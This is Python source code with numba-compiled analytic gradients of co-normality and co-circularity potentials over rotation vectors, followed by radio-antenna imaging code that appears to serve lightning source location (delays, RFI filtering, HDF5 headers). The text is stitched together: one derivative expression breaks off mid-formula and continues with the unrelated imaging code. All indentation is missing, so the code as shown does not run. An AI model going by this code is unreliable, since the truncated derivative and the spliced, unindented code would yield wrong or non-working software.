2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(2*cos_alpha_i**2*u1**2/vi_mag**2 +\
4*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i*u1**2/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i/vi_mag -\
8*sin_alpha_i**2*u0*u1*u2/vi_mag**4 -\
2*sin_alpha_i**2*u1**2/vi_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(-\
2*cos_alpha_i*sin_alpha_i*u0**2*u1/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**3/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
4*sin_alpha_i**2*u0**2*u1/vi_mag**4 +\
4*sin_alpha_i**2*u1**3/vi_mag**4 -\
4*sin_alpha_i**2*u1*u2**2/vi_mag**4 -\
4*sin_alpha_i**2*u1/vi_mag**2)
Dphi_nDu2 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(-\
2*cos_alpha_i**2*u0*u2/vi_mag**2 + 4*\
cos_alpha_i*sin_alpha_i*u0*u2/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
8*sin_alpha_i**2*u1*u2**2/vi_mag**4 +\
4*sin_alpha_i**2*u1/vi_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(2*cos_alpha_i**2*u1*u2/vi_mag**2 +\
4*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i*u1*u2/vi_mag**3 -\
8*sin_alpha_i**2*u0*u2**2/vi_mag**4 + 4*sin_alpha_i**2*u0/vi_mag**2 -\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(-\
2*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u2**3/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u2/vi_mag +\
4*sin_alpha_i**2*u0**2*u2/vi_mag**4 +\
4*sin_alpha_i**2*u1**2*u2/vi_mag**4 -\
4*sin_alpha_i**2*u2**3/vi_mag**4 + 4*sin_alpha_i**2*u2/vi_mag**2)
return array([Dphi_nDu0,Dphi_nDu1,Dphi_nDu2])
"""
Derivative of co-normality potential wrt vj
"""
@jit( f8[:](f8[:], f8[:]), cache=True, nopython=True )
def Dphi_nDvj(vi, vj):
u0,u1,u2 = vi
v0,v1,v2 = vj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_nDv0 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(2*cos_alpha_j**2*v0**2/vj_mag**2 -\
4*cos_alpha_j*sin_alpha_j*v0**2/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j*v0*v1*v2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j/vj_mag - 2*sin_alpha_j**2*v0**2/vj_mag**2 +\
8*sin_alpha_j**2*v0*v1*v2/vj_mag**4) +\
(2*cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(-\
2*cos_alpha_j**2*v0*v1/vj_mag**2 - 4*\
cos_alpha_j*sin_alpha_j*v0**2*v2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j*v0*v1/vj_mag**3 +\
8*sin_alpha_j**2*v0**2*v2/vj_mag**4 +\
2*sin_alpha_j**2*v0*v1/vj_mag**2 - 4*sin_alpha_j**2*v2/vj_mag**2) +\
(cos_alpha_i**2 - cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(2*cos_alpha_j*sin_alpha_j*v0**3/\
vj_mag**3 + 2*cos_alpha_j*sin_alpha_j*v0*v1**2/vj_mag**3 -\
2*cos_alpha_j*sin_alpha_j*v0*v2**2/vj_mag**3 +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag -\
4*sin_alpha_j**2*v0**3/vj_mag**4 -\
4*sin_alpha_j**2*v0*v1**2/vj_mag**4 +\
4*sin_alpha_j**2*v0*v2**2/vj_mag**4 +\
4*sin_alpha_j**2*v0/vj_mag**2)
Dphi_nDv1 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(2*cos_alpha_j**2*v0*v1/vj_mag**2 -\
4*cos_alpha_j*sin_alpha_j*v0*v1/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j*v1**2*v2/vj_mag**3 -\
2*sin_alpha_j**2*v0*v1/vj_mag**2 +\
8*sin_alpha_j**2*v1**2*v2/vj_mag**4 -\
4*sin_alpha_j**2*v2/vj_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(-\
2*cos_alpha_j**2*v1**2/vj_mag**2 - 4*\
cos_alpha_j*sin_alpha_j*v0*v1*v2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j*v1**2/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j/vj_mag +\
8*sin_alpha_j**2*v0*v1*v2/vj_mag**4 +\
2*sin_alpha_j**2*v1**2/vj_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(2*cos_alpha_j*sin_alpha_j*v0**2*\
v1/vj_mag**3 + 2*cos_alpha_j*sin_alpha_j*v1**3/vj_mag**3 -\
2*cos_alpha_j*sin_alpha_j*v1*v2**2/vj_mag**3 +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag -\
4*sin_alpha_j**2*v0**2*v1/vj_mag**4 -\
4*sin_alpha_j**2*v1**3/vj_mag**4 +\
4*sin_alpha_j**2*v1*v2**2/vj_mag**4 +\
4*sin_alpha_j**2*v1/vj_mag**2)
Dphi_nDv2 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(2*cos_alpha_j**2*v0*v2/vj_mag**2 -\
4*cos_alpha_j*sin_alpha_j*v0*v2/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j*v1*v2**2/vj_mag**3 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2 +\
8*sin_alpha_j**2*v1*v2**2/vj_mag**4 -\
4*sin_alpha_j**2*v1/vj_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(-\
2*cos_alpha_j**2*v1*v2/vj_mag**2 - 4*\
cos_alpha_j*sin_alpha_j*v0*v2**2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j*v1*v2/vj_mag**3 +\
8*sin_alpha_j**2*v0*v2**2/vj_mag**4 - 4*sin_alpha_j**2*v0/vj_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(2*cos_alpha_j*sin_alpha_j*v0**2*\
v2/vj_mag**3 + 2*cos_alpha_j*sin_alpha_j*v1**2*v2/vj_mag**3 -\
2*cos_alpha_j*sin_alpha_j*v2**3/vj_mag**3 +\
2*cos_alpha_j*sin_alpha_j*v2/vj_mag -\
4*sin_alpha_j**2*v0**2*v2/vj_mag**4 -\
4*sin_alpha_j**2*v1**2*v2/vj_mag**4 +\
4*sin_alpha_j**2*v2**3/vj_mag**4 - 4*sin_alpha_j**2*v2/vj_mag**2)
return array([Dphi_nDv0,Dphi_nDv1,Dphi_nDv2])
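# A minimal gradient sanity check (added sketch, not part of the original module).
# The scalar potential is passed in as a callable because its name here is an
# assumption; the check compares the sympy-generated analytic gradient above
# against a central finite difference and returns the largest absolute deviation.
def _check_Dphi_nDvj(vi, vj, phi_n, eps=1.0e-6):
    import numpy as np  # local import keeps the sketch self-contained
    analytic = Dphi_nDvj(vi, vj)
    numeric = np.empty(3)
    for k in range(3):
        step = np.zeros(3)
        step[k] = eps  # perturb one component of vj at a time
        numeric[k] = (phi_n(vi, vj + step) - phi_n(vi, vj - step))/(2.0*eps)
    return np.max(np.abs(analytic - numeric))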
"""
Derivative of co-circularity potential wrt vi
"""
@jit( f8[:](f8[:], f8[:], f8[:], f8[:]), cache=True, nopython=True )
def Dphi_cDvi(vi, vj, xi, xj):
u0,u1,u2 = vi
v0,v1,v2 = vj
x0,x1,x2 = xi
y0,y1,y2 = xj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_cDu0 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 -\
4*sin_alpha_i**2*u0**2*u2/vi_mag**4 -\
sin_alpha_i**2*u0*u1/vi_mag**2 + 2*sin_alpha_i**2*u2/vi_mag**2) +\
2*(-x1 + y1)*(-cos_alpha_i**2*u0**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i/vi_mag + sin_alpha_i**2*u0**2/vi_mag**2 -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0*u1**2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u0**3/vi_mag**4 + \
2*sin_alpha_i**2*u0*u1**2/vi_mag**4 -\
2*sin_alpha_i**2*u0*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u0/vi_mag**2))
Dphi_cDu1 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i/vi_mag -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4 -\
sin_alpha_i**2*u1**2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
sin_alpha_i**2*u0*u1/vi_mag**2 -\
4*sin_alpha_i**2*u1**2*u2/vi_mag\
**4 + 2*sin_alpha_i**2*u2/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u1/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**3/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0**2*u1/vi_mag**4 +\
2*sin_alpha_i**2*u1**3/vi_mag**4 -\
2*sin_alpha_i**2*u1*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u1/vi_mag**2))
Dphi_cDu2 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1*u2/vi_mag**3 -\
4*sin_alpha_i**2*u0*u2**2/vi_mag**4 + 2*sin_alpha_i**2*u0/vi_mag**2 -\
sin_alpha_i**2*u1*u2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 +\
sin_alpha_i**2*u0*u2/vi_mag**2 -\
4*sin_alpha_i**2*u1*u2**2/vi_mag\
**4 + 2*sin_alpha_i**2*u1/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u2**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u2/vi_mag +\
2*sin_alpha_i**2*u0**2*u2/vi_mag**4 +\
2*sin_alpha_i**2*u1**2*u2/vi_mag**4 -\
2*sin_alpha_i**2*u2**3/vi_mag**4 + 2*sin_alpha_i**2*u2/vi_mag**2))
return array([Dphi_cDu0,Dphi_cDu1,Dphi_cDu2])
"""
Derivative of co-circularity potential wrt vj
"""
@jit( f8[:](f8[:], f8[:], f8[:], f8[:]), cache=True, nopython=True )
def Dphi_cDvj(vi, vj, xi, xj):
u0,u1,u2 = vi
v0,v1,v2 = vj
x0,x1,x2 = xi
y0,y1,y2 = xj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_cDv0 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_j**2*v0*v1/vj_mag**2 +\
2*cos_alpha_j*sin_alpha_j*v0**2*v2/vj_mag**3 -\
boundingBox_center )/v_air
self.antenna_data_offsets[ant_i] = int(travel_time/5.0E-9)
### find max duration to any of the preferred antennas
max_duration = 0.0
for prefered_ant_i in self.station_to_antenna_indeces_dict[ self.prefered_station ]:
if prefered_ant_i == ant_i:
continue
duration, throw, throw = find_max_duration(self.antenna_locations[ prefered_ant_i ], self.antenna_locations[ant_i], self.bounding_box, boundingBox_center)
if duration > max_duration:
max_duration = duration
self.half_antenna_data_length[ant_i] = int(self.pulse_length/2) + int(max_duration/5.0E-9) ## use the maximum duration over the preferred antennas, not the last one computed
self.antenna_data_offsets[ant_i] -= self.half_antenna_data_length[ant_i]
#### now adjust the data offsets and antenna delays so they are consistent
## first, find the whole-sample part of the antenna delay; this is the amount to shift the data offset by
offset_adjust = int( self.antenna_delays[ant_i]/5.0E-9 ) ##this needs to be added to offsets and subtracted from delays
## then we can adjust the delays accounting for the data offset
self.antenna_delays[ant_i] -= self.antenna_data_offsets[ant_i]*5.0E-9
##now we finally account for large time delays
self.antenna_data_offsets[ant_i] += offset_adjust
self.antenna_delays[ant_i] -= offset_adjust*5.0E-9
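## Worked example (added comment): with an antenna delay of 23.7 ns and a 5 ns
## sampling period, offset_adjust = int(23.7e-9/5.0e-9) = 4, so four whole samples
## of the delay are absorbed into the data offset and only the 3.7 ns sub-sample
## residual of that step remains in antenna_delays.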
if (not self.use_core_stations_S1) or (not self.use_core_stations_S2):
core_filtered_ant_locs = np.array( self.antenna_locations[self.is_not_core] )
core_filtered_ant_delays = np.array( self.antenna_delays[self.is_not_core] )
#### allocate some memory ####
self.data_block = np.empty((self.num_antennas,self.block_size), dtype=np.complex128) ## np.complex is deprecated in newer numpy; the explicit 128-bit dtype is equivalent
self.hilbert_envelope_tmp = np.empty(self.block_size, dtype=np.double)
#### initialize stage 1 ####
if self.use_core_stations_S1:
self.trace_length_stage1 = 2*np.max(self.half_antenna_data_length )
S1_ant_locs = self.antenna_locations
S1_ant_delays = self.antenna_delays
else:
self.trace_length_stage1 = 2*np.max(self.half_antenna_data_length[self.is_not_core] )
S1_ant_locs = core_filtered_ant_locs
S1_ant_delays = core_filtered_ant_delays
self.trace_length_stage1 = 2**( int(np.log2( self.trace_length_stage1 )) + 1 )
self.stage_1_imager = II_tools.image_data_stage1(S1_ant_locs, S1_ant_delays, self.trace_length_stage1, self.upsample_factor)
#### initialize stage 2 ####
if self.use_core_stations_S2:
S2_ant_locs = self.antenna_locations
S2_ant_delays = self.antenna_delays
else:
S2_ant_locs = core_filtered_ant_locs
S2_ant_delays = core_filtered_ant_delays
self.trace_length_stage2 = 2**( int(np.log2( self.pulse_length )) + 1 )
self.stage_2_window = half_hann_window(self.pulse_length, self.hann_window_fraction)
self.stage_2_imager = II_tools.image_data_stage2_absBefore(S2_ant_locs, S2_ant_delays, self.trace_length_stage2, self.upsample_factor)
self.erasure_window = 1.0-self.stage_2_window
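## Note (added comment): erasure_window is the complement of the half-Hann stage-2
## window, so multiplying a located pulse by it smoothly zeroes the pulse centre
## while leaving the tapered edges intact; later iterations can then search for
## weaker sources in the same block.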
def save_header(self, h5_header_file):
header_group = h5_header_file.create_group("header")
header_group.attrs["timeID"] = self.timeID
header_group.attrs["bounding_box"] = self.bounding_box
header_group.attrs["pulse_length"] = self.pulse_length
header_group.attrs["num_antennas_per_station"] = self.num_antennas_per_station
header_group.attrs["stations_to_exclude"] = np.array(self.stations_to_exclude, dtype='S')
header_group.attrs["do_RFI_filtering"] = self.do_RFI_filtering
header_group.attrs["use_saved_RFI_info"] = self.use_saved_RFI_info
if self.initial_RFI_block is None:
header_group.attrs["initial_RFI_block"] = -1
else:
header_group.attrs["initial_RFI_block"] = self.initial_RFI_block
if self.RFI_num_blocks is None:
header_group.attrs["RFI_num_blocks"] = -1
else:
header_group.attrs["RFI_num_blocks"] = self.RFI_num_blocks
if self.RFI_max_blocks is None:
header_group.attrs["RFI_max_blocks"] = - 1
else:
header_group.attrs["RFI_max_blocks"] = self.RFI_max_blocks
header_group.attrs["block_size"] = self.block_size
header_group.attrs["upsample_factor"] = self.upsample_factor
header_group.attrs["max_events_perBlock"] = self.max_events_perBlock
header_group.attrs["min_pulse_amplitude"] = self.min_pulse_amplitude
header_group.attrs["min_pref_ant_amplitude"] = self.min_pref_ant_amplitude
header_group.attrs["positive_saturation"] = self.positive_saturation
header_group.attrs["negative_saturation"] = self.negative_saturation
header_group.attrs["saturation_removal_length"] = self.saturation_removal_length
header_group.attrs["hann_window_fraction"] = self.hann_window_fraction
header_group.attrs["stage_1_converg_num"] = self.stage_1_converg_num
header_group.attrs["stage_1_converg_radius"] = self.stage_1_converg_radius
header_group.attrs["stage_1_max_itters"] = self.stage_1_max_itters
header_group.attrs["use_core_stations_S1"] = self.use_core_stations_S1
header_group.attrs["use_core_stations_S2"] = self.use_core_stations_S2
header_group.attrs["stage_2_max_itter"] = self.stage_2_max_itters
header_group.attrs["stage_2_convergence_length"] = self.stage_2_convergence_length
header_group.attrs["stage_2_break_length"] = self.stage_2_break_length
header_group.attrs["prefered_station_name"] = self.prefered_station
header_group.attrs["trace_length_stage1"] = self.trace_length_stage1
header_group.attrs["trace_length_stage2"] = self.trace_length_stage2
header_group.attrs["erase_pulses"] = self.erase_pulses
header_group.attrs["prefered_station_timing_offset"] = self.prefered_station_timing_offset
header_group.attrs["remove_saturation"] = self.remove_saturation
# header_group.attrs["station_timing_offsets"] = self.station_timing_offsets
# header_group.attrs["additional_antenna_delays"] = self.additional_ant_delays
header_group.attrs["bad_antennas"] = np.array(self.bad_antennas, dtype='S')
header_group.attrs["polarization_flips"] = np.array(self.pol_flips, dtype='S')
no_core_i = 0
for ant_i, (station_i, station_ant_i) in enumerate(self.antennas_to_use):
data_file = self.input_files[station_i]
station = self.station_names[station_i]
ant_name = data_file.get_antenna_names()[ station_ant_i ]
antenna_group = header_group.create_group( str(ant_i) )
antenna_group.attrs["antenna_name"] = ant_name
antenna_group.attrs["location"] = self.antenna_locations[ant_i]
antenna_group.attrs["timing_delay"] = self.antenna_delays[ant_i]
antenna_group.attrs["half_window_length"] = self.half_antenna_data_length[ant_i]
antenna_group.attrs["data_offset"] = self.antenna_data_offsets[ant_i]
antenna_group.attrs["station"] = station
antenna_group.attrs["station_antenna_i"] = station_ant_i
antenna_group.attrs["with_core_ant_i"] = ant_i
if self.is_not_core[ant_i]:
antenna_group.attrs["no_core_ant_i"] = no_core_i
no_core_i += 1
else:
antenna_group.attrs["no_core_ant_i"] = np.nan
def process_block(self, start_index, block_index, h5_groupobject, log_func=do_nothing):
#### open and filter the data ####
prefered_ant_i = None
prefered_ant_dataLoss = np.inf
for ant_i, (station_i, station_ant_i) in enumerate(self.antennas_to_use):
data_file = self.input_files[station_i]
RFI_filter = self.RFI_filters[station_i]
offset = self.antenna_data_offsets[ant_i]
self.data_block[ant_i, :] = data_file.get_data(start_index+offset, self.block_size, antenna_index=station_ant_i) ## get the data. accounting for the offsets calculated earlier
if self.remove_saturation:
remove_saturation(self.data_block[ant_i, :], self.positive_saturation, self.negative_saturation, post_removal_length=self.saturation_removal_length,
half_hann_length=self.saturation_hann_window_length)
if ant_i in self.station_to_antenna_indeces_dict[ self.prefered_station ]: ## this must be done before filtering
num_D_zeros = num_double_zeros( self.data_block[ant_i, :] )
if num_D_zeros < prefered_ant_dataLoss: ## this antenna could be the antenna, in the preferred station, with the least data loss
prefered_ant_dataLoss = num_D_zeros
prefered_ant_i = ant_i
self.data_block[ant_i, :] = RFI_filter.filter( self.data_block[ant_i, :] )
### make output object ###
h5_groupobject = h5_groupobject.create_group(str(block_index))
h5_groupobject.attrs['block_index'] = block_index
h5_groupobject.attrs['start_index'] = start_index
h5_groupobject.attrs['prefered_ant_i'] = prefered_ant_i
#### find sources ####
np.abs( self.data_block[ prefered_ant_i ], out=self.hilbert_envelope_tmp )
for event_i in range(self.max_events_perBlock):
## find peak ##
peak_loc = np.argmax(self.hilbert_envelope_tmp[self.startBlock_exclusion : -self.endBlock_exclusion ]) + self.startBlock_exclusion
trace_start_loc = peak_loc - int( self.pulse_length/2 ) # probably should account for the fact that the trace is now longer than pulse_length on the preferred antenna
if self.hilbert_envelope_tmp[peak_loc] < self.min_pref_ant_amplitude:
log_func("peaks are too small. Done searching")
break
## select data for stage one ##
s1_ant_i = 0
for ant_i, (station_i, station_ant_i) in enumerate(self.antennas_to_use):
if self.use_core_stations_S1 or self.is_not_core[ant_i]:
half_window_length = self.half_antenna_data_length[ant_i]
self.stage_1_imager.set_data( self.data_block[ant_i][trace_start_loc : trace_start_loc+2*half_window_length], s1_ant_i )
s1_ant_i += 1
## fft and xcorrelation ##
self.stage_1_imager.prepare_image( prefered_ant_i, self.min_pulse_amplitude )
log_func("source:", event_i)
stage_1_result, num_itter, num_stage1_itters = stochastic_minimizer(self.stage_1_imager.intensity, self.bounding_box, converg_num=self.stage_1_converg_num,
